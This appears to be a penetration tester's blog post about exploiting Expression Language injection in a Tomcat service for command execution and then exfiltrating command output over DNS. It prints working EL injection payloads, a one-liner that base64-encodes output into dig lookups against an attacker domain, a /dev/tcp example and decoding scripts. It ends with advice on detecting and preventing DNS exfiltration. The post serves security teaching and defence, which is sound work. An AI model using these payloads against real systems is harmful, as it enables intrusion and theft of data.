Breaking, Building

DNS exfiltration case study

Lately, we came across a remote code execution in a Tomcat web service by utilizing Expression Language. The vulnerable POST body field expected a number. When sending ${1+2} instead, the web site included a Java error message about a failed conversion to java.lang.Long from java.lang.String with value "3".

From that error message we learned a couple of things:

  • The application uses Java
  • We are able to execute EL expressions
  • Output from the EL engine is always returned as String

Whenever you are able to execute code within a Java Context, the most interesting part is to check whether we can get a Runtime object and execute arbitrary OS commands.

Sending ${Runtime.getRuntime()} resolves to java.lang.Runtime@de30bb. Great, so we can use Runtime.exec(String cmd) to execute arbitrary code?

Well, we were not able to create any new Object. So ${Runtime.getRuntime().exec("id")} would not work. As exceptions thrown by the EL processing were not contained in the rendered page, the page generation just stopped at the location of the error message. Hard to debug, as we don’t know if any WAF filtered/encoded our payload, or if the way the EL template is evaluated prevents the use of ".

The EL context allows access to some implicit objects as defined in the documentation under Implicit Objects. One of these objects param seemed interesting as it can be used to resolve request parameters into strings. One response later, we had a successful command execution as the output of ${Runtime.getRuntime().exec(param.cmd)} was java.lang.UNIXProcess@2f0a8ba. But was the execution of the command successful? What was it’s output? Java likes it’s factories and interfaces. That said, when trying to read stdout of the UNIXProcess we’d have to create a BufferedReader around a InputStreamReader that reads stdout of the subprocess.

One way to determine the success of the call is to check the return value of it. Given its nature, the return value is only available once the process has finished. Java’s Process interface provides a method int waitFor() that halts the main thread until the sub-processes finished. Its return value represents the status code of the subprocess.

After a small adjustment to the payload, we were able to see that ${Runtime.getRuntime().exec(param.cmd).waitFor()} paired with cmd==sleep+10 results in a response time of just over 10 seconds and an error message that "0" can’t be converted to a Long.

But what about the output? I promised an article about DNS exfiltration. So far, we only talked about RCEs in Tomcat. Given our situation, being unable to include the command output in the page source, we need to resort to an out-of-band communication. The simplest way of doing so would be to check for curl, wget or netcat and just send an HTTP request to a server of ours.

To check for curl availability, we simply used our Burp Collaborator instance by requesting one payload URL. Before even taking a look at the collaborator we knew that we had no success. waitFor showed the status code was 7, which for curl means Failed to connect to host.. Nevertheless, we checked the collaborator which did only show a successful DNS request to our server.

We quickly checked if any DNS tool like nslookup, dig or drill was installed on the server by executing dig <domain> which did succeed.

Extracting user information should be sufficient as a short PoC. Some bash magic later, we had our payload: id | base64 -w 60 | xargs -I ',' dig ,.<domain>. When executing this on the vulnerable application, we always received the return value 1, indicating an error, although everything did work in on our machine. A small Java test program revealed the issue. Java implements a security measure to prevent attackers from injecting multiple commands into a String that is passed to Runtime.exec(String). Therefore, Java provides Runtime.exec(String[]) where the elements are used as arguments to the program.

Onward to the next issue. EL did not allow us to write something like ${Runtime.getRuntime().exec(new String[]{, param.two, ...})}. In hindsight, we maybe could have used the implicit paramValues object, but we totally missed that. We instead used pageContext.request.getParameterValues( which returns an array containing all values of the parameter that is specified in The final payload was


with the parameters name=cmd and cmd=bash&cmd=-c&cmd=<payload>. Using this generic approach, we built some scripts to automate this process, by setting the correct parameters and appending our exfiltration payload to each command.

In the following I will explain the basics of DNS exfiltration, the setup used and the commands we used to transmit and parse the domain names.

The basics

DNS exfiltration uses DNS requests to send data and can be used in rare situations where “normal” Internet traffic is either blocked or filtered. As DNS requests can propagate through DNS resolvers, even if the system requesting the domain name cannot reach the DNS server directly, it might still be possible to extract data through this channel.

The basic idea is to encode data in a domain-safe way and send it through DNS requests to the attacker’s DNS server

The setup

Given an already exploited target, we need any tool on the target that creates DNS request. This can either be a dedicated program like dig or drill but any networking tool like wget, curl, netcat, host, bash -c "echo "test" > /dev/tcp/$host/$port, etc. can be used.

On the receiving end we need a publicly reachable server with UDP port 53 not being blocked. Any VPS should be suitable for this. Even some ISPs allow port forwarding on private Internet connections.

To instruct DNS resolvers to send requests to our server we need to set a NS record on any domain pointing to our server IP.

Lastly, we need to listen on the receiving server on port 53 UDP and parse incoming requests.

Is there any tooling?

During our project we just needed a PoC, therefore only some bash scripts exists that basically boil down to the payload described above and some parsing.

The final exfiltration command has been improved to support ordering. It does require some more tools, which are very basic and should be supported on most default installations of linux.

<cmd> | base64 -w 60 | cat -n | awk '{{$1=$1}};1' | sed 's/ /\\n/' | xargs -L 2 -n 2 bash -c 'dig $1.$0.<domain>'

In detail:

  • We run the command
  • We pipe its output in base64 with a sub 63 character length that is dividable by 4 (base64 stores 3 bytes in 4 characters)
  • Using cat -n each line will be prefixed with the respective line number
  • The awk call will remove any leading whitespaces
  • Using sed we split the line number and content into two separate rows
  • With xargs we use two lines as the two parameters for bash
  • We create a call to dig formated as <data>.<line no>.<domain>

To capture the DNS requests we simply started tcpdump for port 53 UDP. When running e.g. id we would get output similar to the following:

16:44:24.860040 IP XXX.XXX.XXX.XXX.47679 > YYY.YYY.YYY.YYY.53: 61071 [1au] A? dWlkPTEwMDAoaG56bG1ubikgZ2lkPTk4NSh1c2VycykgZ3JvdXBzPTk4NSh1.1.<domain>. (103)
16:44:24.887303 IP XXX.XXX.XXX.XXX.39556 > YYY.YYY.YYY.YYY.53: 2045 [1au] A? c2VycyksNTQobG9jayksOTgocG93ZXIpLDEwOCh2Ym94dXNlcnMpLDE1MCh3.2.<domain>. (103)
16:44:25.050284 IP XXX.XXX.XXX.XXX.45014 > YYY.YYY.YYY.YYY.53: 34349 [1au] A? aXJlc2hhcmspLDk3MyhsaWJ2aXJ0KSw5ODYodmlkZW8pLDk4Nyh1dWNwKSw5.3.<domain>. (95)
16:44:25.080283 IP XXX.XXX.XXX.XXX.45614 > YYY.YYY.YYY.YYY.53: 34497 [1au] A? ODgoc3RvcmFnZSksOTk1KGF1ZGlvKSw5OTgod2hlZWwpCg==.4.<domain>. (95)

Depending on the DNS configuration there can be more than one request per domain name. For better overview I stripped out these duplicated in the above output. Also, it might happen that the requests are not received in the correct order.

To take care of the sorting and removal of duplicated, we used the following on-liner

cat $1 | egrep -o '[^ ]\.<domain>' | sed 's/\.<domain>//' | sed 's/\./\t/' | sort -k2 | uniq | sed 's/\t.//' | tr -d "\n" | base64 -d

Which does the following things:

  • Extract the domain names ending with our specified domain
  • Remove the domain part
  • Split the lines at . by inserting a tab
  • Sort all entries by the second column (the line number)
  • Remove all duplicates
  • Delete the line number
  • Concatenate all lines into one
  • Base64-decode the data

For our example above this would result in:

uid=1000(hnzlmnn) gid=985(users) groups=985(users),54(lock),98(power),108(vboxusers),150(wireshark),973(libvirt),986(video),987(uucp),988(storage),995(audio),998(wheel)

Due to the pain of creating the bash scripts, them using hard-coded domains and no possibility to run multiple commands in parallel without mixing-up the requests I created Dora the DNS explorer. Dora uses scapy to sniff on an interface, parsing each DNS request received and stores it in a database. To separate different command outputs from each other, I introduced another part of the domain called context. Using Swiper, the extraction part of the tool, you are able to generate exfiltration payloads for different tools, or simply generate a new context to use in custom payloads.

How can I detect DNS exfiltration?

DNS exfiltration, just like any other exfiltration channels, can be detected by observing the amount of data transferred through a channel over a given amount of time. If an attacker starts exfiltration through DNS the system will suddenly have an increased amount of outgoing DNS traffic. What if the web application does a lot of communication with other APIs or polls data from the Internet? Well, if the application does request a lot of APIs in the Internet, the amount of different domains queried should stay low, whereas an attacker exfiltrating data will need to request different domains that each represent a portion of data.

Which metrics can be interesting?

When trying to identify malicious activities, two metrics are of interest from our point of view:

  • How much unique requests are sent from one client
  • How much unique requests per SLD(/TLD) are sent

Depending on your security concerns, there are multiple approaches. Only logging successful DNS request may not be sufficient.

Have a look at Evernote’s bro script collection for inspiration.


Servers that do not need to connect to other hosts do not need a DNS server to be configured. For internal hostnames an internal DNS server that does not forward requests to upstream servers can be used.

If the service needs to resolve hostnames on the Internet, a monitoring should be set up, to detect and analyze data being exfiltrated. If the domains, the server needs to resolve, are known and do not change, a whitelisting can also be set up.


Dora the DNS explorer is still work in progress and does not include many features, yet. It should still be sufficient to capture, store and extract DNS requests. If you are missing a critical feature such a tool definitely needs, feel free to reach out to me.

If you happen to be at TROOPERS20, we can have a chat over a beer 😉


Leave a Reply

Your email address will not be published. Required fields are marked *